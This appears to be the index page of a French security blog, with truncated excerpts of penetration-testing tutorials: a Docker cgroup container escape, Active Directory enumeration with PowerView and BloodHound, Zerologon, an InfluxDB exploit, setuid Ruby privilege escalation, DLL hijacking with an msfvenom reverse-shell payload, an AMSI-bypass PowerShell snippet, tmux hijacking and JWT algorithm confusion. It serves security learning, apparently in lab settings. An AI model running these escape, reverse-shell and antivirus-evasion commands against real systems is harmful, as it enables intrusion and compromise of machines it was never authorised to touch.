Sortir d’un container docker

# Sur l'hôte docker run –rm -it –cap-add=SYS_ADMIN –security-opt apparmor=unconfined ubuntu bash # Dans le container mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x echo 1 > /tmp/cgrp/x/notify_on_release host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab` echo "$host_path/cmd" > /tmp/cgrp/release_agent #For a normal PoC ================= echo '#!/bin/sh' > /cmd echo "ps aux > $host_path/output" … Continuer la lecture

Post-Exploitation

Post-Exploitation Powerview est un script de la suite powershell empire qui peut etre utilisé pour l’énumération après que vous ayez obtenu l’accèes au système. Vous trouvez les scripts utilisés dans cet archive powershell -ep bypass . .\PowerView.ps1 Get-NetUser | select cn Get-NetGroup -GroupName *admin* Énumération avec Bloodhound apt-get install bloodhound neo4j console (neo4j:neo4j) bloodhound powershell … Continuer la lecture

Vulnérabilité zero logon

Objectif : utiliser la vulnérabilité Zero Logon pour outrepasser l’authentification sur la machine agissant comme controlleur de domaines Utiliser secretsdump.py pour obtenir les identifiants cracker les hashes avoir du plaisir Microsoft a choisi d’utiliser l’encryption AES-CFB8 pour la fonction ComputeNetlogonCredential de MS-NRPC. Le problème est le vecteur d’initialisation utilisé qui ne contient que des “0” … Continuer la lecture

Exploit InfluxDB 1.30

Il y a un bug dans InfluxDB et nous pouvons trouver le nom d’un usager en visitant le URL http://10.10.169.83:8086/debug/requests Nous pouvons utiliser le script https://github.com/LorenzoTullini/InfluxDB-Exploit-CVE-2019-20933 pour nous créer un token et accéder à la base de données show databases show tag keys on creds #creds est le nom d'une base de données show tag … Continuer la lecture

Obtenir le compte administrateur avec Ruby

On se rend compte avec linPEAS que Ruby a les capabilities setuid On peut facilement obtenir le compte de l’administrateur. Si Ruby a été protégé avec apparmor pour ne pouvoir exécuter que quelques utilitaires et avoir accès qu’à certains fichiers #include <tunables/global> /usr/bin/ruby2.5 {   #include <abstractions/base>   capability setuid,   deny owner /etc/nsswitch.conf r,   deny /root/* rwx, … Continuer la lecture

DLL Hijacking

Étapes pour réussir l’injection de DLL sous windows Identifier l’application vulnérable et son emplacement Identifer le ID du processus Identifier les DLL vulnérables qui peuvent être hijackés Remplacer la DLL d’origine Génération d’une DLL pour création d’une session meterpreter sudo msfvenom -p windows/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=53 -f dll -o not_malicious.dll Conditions pour qu’une DLL soit vulnérable … Continuer la lecture

Modifier du code pour s’évader de l’antivirus

Ce script permet de désactiver AMSI //bypass.ps1 $MethodDefinition = "     [DllImport(`"kernel32`")]     public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);     [DllImport(`"kernel32`")]     public static extern IntPtr GetModuleHandle(string lpModuleName);     [DllImport(`"kernel32`")]     public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect); "; $Kernel32 = Add-Type -MemberDefinition $MethodDefinition -Name 'Kernel32' -NameSpace 'Win32' -PassThru; $ABSD = 'AmsiS'+'canBuffer'; $handle … Continuer la lecture

TMUX session hijacking

Installation de tmux sudo apt-et install tmux #installation de tmux sous Ubuntu tmux -V #déterminer la version Les sessions tmux #crée une nouvelle session tmux new -s openvpn #crée une esssion avec le nom openvpn La barre verte en bas de l’écran indique que nous sommes dans une session tmux (le symbole * indique le … Continuer la lecture

Quelques commandes de metasploit

Metasploit est une plateforme complète pour l’exploitation de cibles fonctionnant sur une multitude de plateformes. Tout le monde le sait. Mais metasploit peut faire beaucoup plus. Création de rapports de vulnérabilités Recherche de vulnérabilités dans un service spécifique dans un réseau entier Création d’espace de travail(workspace) pour différents projets(clients) Enregistrement dans la base de données … Continuer la lecture

Vulnérabilité dans les tokens JWT

Structure d’un token header.payload.secret Les sections sont encodés en base64 Structure d’un header {“typ”:”JWT”,”alg”:”RS256″} Si on a la clé publique du serveur, on peut réencoder le token -Changer l’algorithme dans le header par HS256 (HS256 est symétrique, rs256 est asymétrique) cat a.pem | xxd – p | tr -d “\\n” (convertit la clé publique du … Continuer la lecture